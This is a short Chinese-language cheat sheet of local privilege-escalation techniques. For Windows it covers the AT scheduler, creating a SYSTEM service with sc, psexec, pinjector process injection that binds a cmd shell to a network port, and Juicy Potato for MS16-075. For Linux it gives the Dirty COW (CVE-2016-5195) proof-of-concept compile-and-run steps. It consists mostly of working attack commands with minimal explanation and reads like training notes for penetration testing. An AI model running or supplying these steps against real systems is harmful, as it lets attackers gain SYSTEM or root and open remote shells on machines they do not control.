本地提权
方法一:AT命令提权
条件:(1)适应范围(win3->win8) (2)必须在administrats组
at 18:41 /interactive cmd
taskmgr //打开一个进程
杀死当前explorer.exe桌面进程,再开启就是system
方法二:创建服务提权
创建一个服务
sc Create syscmd binPath= “cmd /K start” type= own type= interact
sc start syscmd
方法三:内核提权
psexec -i -s -d cmd
pinjector.exe -p 2152 cmd 12345
方法四:进程注入
优点:隐藏进程
pinjector.exe -l //列出当前可被注入的进程
pinjector -p PID cmd 端口 //注入指定进程将cmd反弹给连接该端口
漏洞提权
烂土豆提权 ---------软件在/工具/提权/烂土豆
MS16-075漏洞
原理:令牌提权
步骤:
Juicypotato.exe -p whoami
脏牛提权(linux)
(CVE-2016-5195)内核提权漏洞分析
原理:Linux内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。
影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。
实验工具 gcc:linux系统下的编译器,用于编译程序
dirtyc.c:本次实验漏洞验证的POC源码
步骤:
gcc -pthread dirty.c -o dirty -lcrypt //编译
./dirty password